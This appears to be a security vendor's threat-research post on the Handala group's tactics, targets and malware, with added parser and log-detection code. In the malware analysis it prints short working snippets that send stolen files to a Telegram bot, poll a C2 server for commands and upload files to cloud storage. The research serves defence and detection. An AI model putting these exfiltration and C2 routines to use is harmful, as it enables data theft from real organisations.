For over a year, Handala has been relentlessly targeting the Israeli sector, evolving from a disruptive nuisance to a formidable cyber threat. What started as unsophisticated phishing campaigns and DDoS attacks has now escalated into a full-fledged offensive against critical infrastructure. But what exactly changed?
In this first-of-its-kind research, we reveal how Handala has transformed from a hacktivist group into an aspiring nation-state-level adversary, leveraging advanced tactics, stolen credentials, and covert data exfiltration techniques. With the help of our in-house AI-powered analysis tools, we dissect their malware, uncover hidden operational patterns, and reverse-engineer their attack framework.
For the first time, we reveal their evolving tactics, the technologies fueling their operations, and their methods for siphoning sensitive data to cloud storage and Telegram.
This isn’t just another cyber threat; it’s a turning point.
And trust us, there’s a lot to unpack…
Why OP Innovate Conducted This Research
At OP Innovate, we pride ourselves on delivering top-tier incident response (IR) services, and over the past several months, we’ve been on the front lines of multiple Handala-related investigations. Time and time again, we’ve seen the same pattern: organizations blindsided by an attacker that was evolving faster than most defenders could react.
Through these real-world incidents, we uncovered a wealth of Indicators of Compromise (IOCs), intel that wasn’t publicly available anywhere else. And that’s when the idea struck: what if we took the time to dig deeper? By reverse-engineering the traces Handala left behind and following the breadcrumbs, we could piece together their evolving playbook. More importantly, we can use these insights to arm future victims with the knowledge to detect, disrupt, and defend against these attacks before their data is compromised.
This research isn’t just about understanding Handala; it’s about staying one step ahead.
Handala 2.0: From Keyboard Warriors to Cyber Militants
Over the past six months, Handala has evolved from a disruptive hacktivist collective into a structured cyber threat actor, adopting nation-state-level tactics and expanding its target selection from random disruptions to calculated attacks on critical infrastructure. This transition reflects a shift from cyber vandalism to organized cyber warfare, with a growing focus on stealth, persistence, and large-scale data exfiltration.
Tactics: From Defacements to Strategic Infiltration
- Credential-Based Attacks: Handala has moved away from simplistic DDoS attacks and defacements, instead exploiting stolen credentials from dark web marketplaces. By targeting organizations that do not enforce multi-factor authentication (MFA), they gain stealthy, long-term access without triggering security alerts.
- Privilege Escalation & Backdoors: Once inside a network, Handala rapidly escalates privileges, often creating backdoor accounts to maintain access even if the initial entry point is patched. This persistence allows them to return to compromised networks at will.
- Cloud-Based Exfiltration: Rather than relying on direct data transfers, Handala stores exfiltrated data in legitimate cloud services like Storj and Vultr, making their operations harder to detect and disrupt.
- Multi-Channel C2 & Evasion Techniques: Handala’s malware blends into normal network traffic by communicating over Telegram’s encrypted API, HTTP-based C2 servers, and cloud APIs, making detection challenging.
Target Selection: From Random Disruptions to High-Value Supply Chain Attacks
- Early Targets:
  - Small businesses and media outlets.
  - Public-facing websites, often attacked for maximum visibility rather than operational impact.
- Recent Targets:
  - Supply Chain Vendors – Instead of attacking individual organizations directly, Handala breaches IT and cloud service providers to gain access to multiple downstream victims.
  - Critical Infrastructure – The group has increasingly targeted companies providing essential services, with a focus on IT management, cloud services, and engineering firms.
Some of their most recent confirmed breaches include:
- ReutOne (CRM Provider) – This breach also allowed indirect access to Allen Carr’s Easyway, a well-known addiction treatment institution.
- Zuk Group (Construction & Engineering Firm) – A multinational financial and technology conglomerate.
These attacks indicate a deliberate shift towards infiltrating service providers, a hallmark of sophisticated, long-term cyber campaigns aimed at gaining access to entire industries rather than single entities.
Unpacking Handala: Tracing the Trail of Stolen Data
Using forensic evidence from multiple breach sites, we conducted a deep dive into Handala’s malware infrastructure, exfiltration techniques, and operational persistence mechanisms. Our findings confirm that Handala is not just breaching networks but systematically organizing and distributing stolen intelligence to secure locations.
Phase 1: Extracting and Analyzing the Malware
1. Cracking Open senvarservice-DC.exe
One of the first major discoveries in our investigation was a Windows executable (senvarservice-DC.exe), which turned out to be a PyInstaller-packed Python script masquerading as a legitimate application.
By unpacking the executable, we found:
- Amazon botocore references, suggesting AWS S3 was being used for data exfiltration.
- PyQt5 dependencies, indicating a GUI component that could be used for disguise.
2. Automating Reverse Engineering with LISA
Using LISA (Layered Inspection & Structural Analysis), our AI-powered reverse engineering tool, we were able to:
- Disassemble the binary and extract its structure.
- Decompile the Python code hidden within.
- Detect Indicators of Compromise (IOCs).
With LISA, we accelerated the unpacking process, allowing us to focus on analyzing Handala’s malware behavior rather than just its packaging.
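As an added illustration of the unpacking step described above and of the structural extraction LISA automates (this is editorial example code, not OP Innovate's tooling and not code from the malware), the following Python parses the cookie and table of contents that every PyInstaller-built executable appends to its tail, lists the embedded scripts and binaries, and flags library names such as botocore and PyQt5. The sample executable is constructed inside the script; its entry names are stand-ins, and the only names taken from the page are senvarservice-DC, botocore and PyQt5.

```python
import struct
import zlib

# PyInstaller CArchive layout (public bootloader format, PyInstaller 2.1 and later):
# [PE image][entry data ...][table of contents][88-byte cookie]
PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"        # magic, archive length, TOC offset, TOC length, python version, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)        # 88
TOC_ENTRY_FMT = "!iIIIBc"        # entry length, data offset, compressed len, uncompressed len, zlib flag, type code
TOC_ENTRY_HDR = struct.calcsize(TOC_ENTRY_FMT)   # 18
# Libraries whose presence the page reports for senvarservice-DC.exe
SUSPECT_LIBS = ("botocore", "PyQt5")


def parse_pyinstaller(data: bytes):
    """Return archive metadata and TOC entries, or None if no PyInstaller cookie is present."""
    cookie_pos = data.rfind(PYINST_MAGIC)
    if cookie_pos == -1 or cookie_pos + COOKIE_SIZE > len(data):
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(
        COOKIE_FMT, data[cookie_pos:cookie_pos + COOKIE_SIZE])
    # pkg_len covers entry data + TOC + cookie, so the archive starts pkg_len bytes before the cookie's end
    archive_start = cookie_pos + COOKIE_SIZE - pkg_len
    toc = data[archive_start + toc_off:archive_start + toc_off + toc_len]
    entries, pos = [], 0
    while pos + TOC_ENTRY_HDR <= len(toc):
        entry_len, data_off, clen, ulen, zflag, typ = struct.unpack(
            TOC_ENTRY_FMT, toc[pos:pos + TOC_ENTRY_HDR])
        if entry_len <= TOC_ENTRY_HDR:      # malformed entry; stop rather than loop forever
            break
        name = toc[pos + TOC_ENTRY_HDR:pos + entry_len].rstrip(b"\0").decode("utf-8")
        entries.append({"name": name, "type": typ.decode(), "offset": archive_start + data_off,
                        "clen": clen, "ulen": ulen, "compressed": bool(zflag)})
        pos += entry_len
    return {"pyver": pyver, "pylib": pylib.rstrip(b"\0").decode(), "entries": entries}


def read_entry(data: bytes, entry: dict) -> bytes:
    """Extract one TOC entry's payload, inflating it when the zlib flag is set."""
    raw = data[entry["offset"]:entry["offset"] + entry["clen"]]
    return zlib.decompress(raw) if entry["compressed"] else raw


def triage(data: bytes) -> dict:
    """Summarise a sample: PyInstaller or not, embedded Python version, scripts, suspect libraries."""
    info = parse_pyinstaller(data)
    if info is None:
        return {"pyinstaller": False}
    names = [e["name"] for e in info["entries"]]
    return {
        "pyinstaller": True,
        "pyver": info["pyver"],
        "scripts": [e["name"] for e in info["entries"] if e["type"] == "s"],
        "suspect_libs": sorted({lib for lib in SUSPECT_LIBS if any(lib in n for n in names)}),
    }


def build_carchive(items, pyver=312) -> bytes:
    """Constructed test fixture: a minimal PyInstaller-style overlay (not taken from a real sample)."""
    body = b""
    toc = b""
    for name, typ, payload, compress in items:
        blob = zlib.compress(payload) if compress else payload
        nm = name.encode() + b"\0"
        nm += b"\0" * ((-(TOC_ENTRY_HDR + len(nm))) % 16)   # PyInstaller pads entries to 16 bytes
        entry_len = TOC_ENTRY_HDR + len(nm)
        toc += struct.pack(TOC_ENTRY_FMT, entry_len, len(body), len(blob), len(payload),
                           int(compress), typ) + nm
        body += blob
    pkg_len = len(body) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, pkg_len, len(body), len(toc), pyver, b"python312.dll")
    return body + toc + cookie


# Constructed stand-in for senvarservice-DC.exe: a dummy PE stub followed by the archive
SAMPLE_EXE = b"MZ" + b"\x90" * 64 + build_carchive([
    ("senvarservice-DC", b"s", b"import requests\n# constructed stub\n", True),
    ("PYZ-00.pyz", b"z", b"PYZ\0" + b"\0" * 16, False),
    ("PyQt5\\Qt5\\bin\\Qt5Core.dll", b"b", b"MZ" + b"\0" * 32, True),
    ("botocore\\cacert.pem", b"x", b"-----BEGIN CERTIFICATE-----\n", True),
])

if __name__ == "__main__":
    print(triage(SAMPLE_EXE))
    script = next(e for e in parse_pyinstaller(SAMPLE_EXE)["entries"] if e["type"] == "s")
    print(read_entry(SAMPLE_EXE, script).decode())
```

On a real sample the type-'s' entries are the entry-point scripts, the 'z' entry is the PYZ bundle holding the compiled modules (which is where the botocore and PyQt5 .pyc files would sit), and the embedded Python version in the cookie tells you up front which decompiler generation you will need.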
Phase 2: Breaking Down the Code
Once the internal Python scripts were extracted, we needed to decompile them. However, the malware was written in Python 3.12, making traditional decompilers like uncompyle6 and pycdc ineffective.
Automating the Decompilation Process
To handle this, we built a custom automation script that:
- Uploaded .pyc files to Pylingual.io for decompilation.
- Fetched results and saved readable Python scripts.
- Allowed bulk processing, significantly reducing manual workload.
Once the code was fully decompiled, we moved to Phase 3: Understanding Handala’s Attack Framework.
Phase 3: Understanding Handala’s Cyber Toolkit
1. Telegram API for Data Exfiltration
The malware automates data exfiltration via Telegram bots, making it harder to detect.
```python
import requests

def send_document(bot_token, chat_id, file_path):
    # Telegram Bot API endpoint; the bot token is embedded in the URL path
    url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
    # The stolen file is sent as a multipart upload to the attacker-controlled chat
    with open(file_path, 'rb') as fh:
        files = {"document": fh}
        payload = {"chat_id": chat_id}
        response = requests.post(url, files=files, data=payload)
    return response.status_code
```
2. HTTP-Based C2 for Command Retrieval
The malware periodically checks its hardcoded HTTP C2 server for commands.
```python
import requests

# server_url is the hardcoded C2 address defined elsewhere in the malware (not reproduced here);
# log_error is the malware's own logging helper.
def fetch_c2_command():
    try:
        # Poll the C2 endpoint and hand back its JSON body as the command to execute
        response = requests.get(f"{server_url}/command")
        if response.status_code == 200:
            return response.json()
    except Exception as e:
        log_error(f"Error fetching commands: {str(e)}")
    return None
```
3. Cloud-Based Storage for Stolen Data
The malware uploads stolen files to Storj cloud storage for long-term retention.
```python
import os
import boto3

# S3_access_key / S3_secret_key are credentials hardcoded elsewhere in the sample
def upload_to_s3(file_path):
    session = boto3.Session(aws_access_key_id=S3_access_key,
                            aws_secret_access_key=S3_secret_key)
    # No endpoint_url is passed here, so boto3 defaults to AWS S3; an S3-compatible
    # gateway such as Storj's would need one supplied to session.resource()
    s3 = session.resource('s3')
    bucket = s3.Bucket('handala-bucket')
    # The stolen file keeps its original basename as the object key
    bucket.upload_file(file_path, os.path.basename(file_path))
```
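Turning the three channels described in Phase 3 into detection logic, as an added example that is not part of the original research: the script below runs three checks over constructed proxy log lines (Telegram Bot API calls, fixed-interval polling of a /command endpoint, and large uploads to S3-style object storage). The log format, IP addresses, the 1 MiB threshold and the storjshare.io gateway suffix are assumptions made for the example; the bucket name handala-bucket and the /command path come from the code shown above.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlparse

# Constructed proxy log lines (not from any real incident):
# "<ISO timestamp> <client ip> <method> <url> <status> <bytes sent by client>"
SAMPLE_LOG = """\
2025-01-14T09:00:00 10.0.0.5 GET http://203.0.113.10:8080/command 200 312
2025-01-14T09:01:00 10.0.0.5 GET http://203.0.113.10:8080/command 200 312
2025-01-14T09:02:01 10.0.0.5 GET http://203.0.113.10:8080/command 200 312
2025-01-14T09:03:00 10.0.0.5 GET http://203.0.113.10:8080/command 200 312
2025-01-14T09:04:00 10.0.0.5 GET http://203.0.113.10:8080/command 200 312
2025-01-14T09:04:30 10.0.0.5 POST https://api.telegram.org/bot123456:REDACTED/sendDocument 200 58213
2025-01-14T09:05:10 10.0.0.5 PUT https://handala-bucket.s3.amazonaws.com/hr_export.zip 200 4194304
2025-01-14T09:06:00 10.0.0.7 GET https://www.example.com/ 200 1024
2025-01-14T09:12:00 10.0.0.7 GET https://www.example.com/news 200 2048
2025-01-14T09:40:00 10.0.0.7 GET https://www.example.com/about 200 900
"""

# Telegram Bot API calls carry the bot token in the URL path: /bot<token>/<method>
TELEGRAM_BOT_RE = re.compile(r"^/bot[^/]+/(sendDocument|sendMessage|getUpdates)$")
# Hostname suffixes of S3-style object storage; the Storj gateway suffix is an assumption
OBJECT_STORE_SUFFIXES = (".amazonaws.com", ".storjshare.io")
BULK_UPLOAD_BYTES = 1 << 20   # 1 MiB sent in a single request from a workstation


def parse_line(line: str) -> dict:
    ts, client, method, url, status, sent = line.split()
    u = urlparse(url)
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "host": u.hostname or "", "path": u.path, "status": int(status), "bytes": int(sent)}


def detect_telegram_bot_api(events):
    """Any Bot API call from an endpoint is worth an alert; sendDocument means a file left the host."""
    alerts = []
    for e in events:
        m = TELEGRAM_BOT_RE.match(e["path"])
        if e["host"] == "api.telegram.org" and m:
            # Record the API method only, never the token embedded in the path
            alerts.append({"rule": "telegram_bot_api", "client": e["client"],
                           "detail": f"{e['method']} api.telegram.org {m.group(1)}"})
    return alerts


def detect_beaconing(events, min_hits=4, max_cv=0.1):
    """Flag a client polling the same URL at near-constant intervals (C2 command check-in)."""
    groups = defaultdict(list)
    for e in events:
        if e["method"] == "GET":
            groups[(e["client"], e["host"], e["path"])].append(e["ts"])
    alerts = []
    for (client, host, path), stamps in groups.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        # A coefficient of variation near zero means a timer, not a person
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_cv:
            alerts.append({"rule": "c2_beaconing", "client": client,
                           "detail": f"GET {host}{path} x{len(stamps)}, ~{mean:.0f}s apart"})
    return alerts


def detect_bulk_cloud_upload(events):
    """Large PUT/POST bodies to object storage straight from a client are candidate exfiltration."""
    return [{"rule": "bulk_cloud_upload", "client": e["client"],
             "detail": f"{e['method']} {e['host']} {e['bytes']} bytes"}
            for e in events
            if e["method"] in ("PUT", "POST") and e["bytes"] >= BULK_UPLOAD_BYTES
            and e["host"].endswith(OBJECT_STORE_SUFFIXES)]


def analyze(log_text: str) -> list:
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    return detect_telegram_bot_api(events) + detect_beaconing(events) + detect_bulk_cloud_upload(events)


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The beacon check deliberately keys on the client, host and path rather than on any indicator list, so it still fires when the C2 address changes; the object-storage check is the noisy one in practice and is best scoped to hosts that have no business writing to cloud buckets.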
Final Observations: The Future of Handala’s Cyber Operations
- Stealth & Persistence: Handala’s use of multi-channel exfiltration and modular malware design allows for long-term infiltration.
- Adaptive Strategy: Attackers can switch C2 infrastructure, encryption methods, and targets in real-time.
- Supply Chain Targeting: By compromising IT vendors, Handala can expand its reach beyond a single victim.
Understanding these tactics is critical for cybersecurity teams, as Handala continues to refine its strategy against high-value organizations.